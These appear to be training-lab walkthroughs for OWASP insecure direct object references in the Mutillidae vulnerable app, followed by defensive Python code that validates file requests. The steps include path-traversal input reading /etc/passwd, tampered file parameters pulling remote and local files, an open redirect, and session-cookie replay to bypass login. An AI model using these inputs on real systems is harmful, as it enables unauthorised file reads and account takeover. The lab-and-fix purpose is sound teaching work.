OWASP 2013---A4 - Insecure Direct Object References---Text File Viewer
David Stec.
1) Navigate to http://127.0.0.1/mutillidae/index.php?page=text-file-viewer.php with local proxy set to localhost:8080
2) Start burpsuite with intercept on
3) Pick a random file from the drop down list and click View File
4) In burpsuite, change
textfile=http%3A%2F%2Fwww.textfiles.com%2Fhacking%2Fbackdoor.txt&text-file-viewer-php-submit-button=View+File
to
textfile=http%3A%2F%2Fwww.textfiles.com%2Fhacking%2Faix.fun&text-file-viewer-php-submit-button=View+File
5) View the file aix.fun in the browser (a file not in the drop down list previously)

OWASP 2013---A4 - Insecure Direct Object References---Source Viewer
David Stec.
1) Navigate to http://127.0.0.1/mutillidae/index.php?page=source-viewer.php with local proxy set to localhost:8080
2) Start burpsuite with intercept on
3) Pick a random file from the drop down list and click View File, i.e. browser-info.php
4) In burpsuite, change
page=source-viewer.php&phpfile=browser-info.php&source-file-viewer-php-submit-button=View+File
to
page=source-viewer.php&phpfile=/usr/share/metasploit-framework/data/php/hop.php&source-file-viewer-php-submit-button=View+File
5) View the local file in the browser (a file not in the drop down list previously)

OWASP 2013---A4 - Insecure Direct Object References---Credits
David Stec.
1) Navigate to http://127.0.0.1/mutillidae/index.php?page=credits.php
2) Add ?page=redirectandlog.php&forwardurl=http://www.youporn.com/ to the URL http://127.0.0.1/mutillidae/index.php?page=credits.php so it shows "http://127.0.0.1/mutillidae/index.php?page=credits.php?page=redirectandlog.php&forwardurl=http://www.youporn.com/"

OWASP 2013---A4 - Insecure Direct Object References---Cookies
David Stec.
1) Log in normally with an account to http://kalie530/mutillidae/index.php?page=login.php
2) Determine the cookie PHPSESSID= of the active session via cookie-cadger (can also use burpsuite or firebug)
3) Close the browser window while still logged in
4) Navigate to http://kalie530/mutillidae/index.php?page=login.php (should be logged out)
5) Put in fake credentials and turn on intercept in burpsuite
6) Click login, change the PHPSESSID= to the previous one
7) With fake credentials, login should be successful once you click forward

OWASP 2013---A4 - Insecure Direct Object References---Arbitrary File Inclusion
David Stec.
1) Navigate to http://127.0.0.1/mutillidae/index.php?page=text-file-viewer.php with local proxy set to localhost:8080
2) Start burpsuite with intercept on
3) Pick a random file from the drop down list and click View File
4) In burpsuite, change
textfile=http%3A%2F%2Fwww.textfiles.com%2Fhacking%2Fbackdoor.txt&text-file-viewer-php-submit-button=View+File
to
textfile=../../../../etc/passwdTEMP&text-file-viewer-php-submit-button=View+File
5) View the /etc/passwd in the browser
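The text-file viewer, source viewer and arbitrary file inclusion walkthroughs above all succeed because the `textfile=` / `phpfile=` value is used as a direct object reference. The following is an added example of the server-side check such a page needs (hypothetical code, not Mutillidae's own); it assumes a constructed allowlist and base directory and is run against the tampered values from the notes.

```python
import os
from typing import FrozenSet, Optional

# Constructed allowlist standing in for the source viewer's drop-down entries;
# hypothetical, not Mutillidae's own list.
ALLOWED_SOURCE_FILES: FrozenSet[str] = frozenset({"browser-info.php", "credits.php"})


def resolve_requested_file(requested: str, base_dir: str,
                           allowed: FrozenSet[str] = ALLOWED_SOURCE_FILES) -> Optional[str]:
    """Return the absolute path to serve, or None if the request must be refused.

    Layer 1: the submitted value must be exactly one of the names the form
    offers, so URLs, absolute paths and ../ sequences are refused before any
    path arithmetic happens.
    Layer 2: the canonical path must still lie inside base_dir, which also
    catches a bad allowlist entry or a symlink pointing outside the web root.
    """
    if requested not in allowed:
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def audit_request(requested: str, base_dir: str = "/var/www/mutillidae") -> str:
    """One log-style verdict per request, suitable for a detection feed."""
    path = resolve_requested_file(requested, base_dir)
    return "ALLOW %s" % path if path else "REJECT %r" % requested


if __name__ == "__main__":
    # Constructed inputs: the form's legitimate value and the tampered values
    # from the walkthroughs above.
    for value in ("browser-info.php",
                  "/usr/share/metasploit-framework/data/php/hop.php",
                  "../../../../etc/passwd",
                  "http://www.textfiles.com/hacking/aix.fun"):
        print(audit_request(value))
```

The better long-term fix is the indirect reference map OWASP recommends for A4 (the form submits an opaque index, never a filename), with this canonical-path check kept as defence in depth.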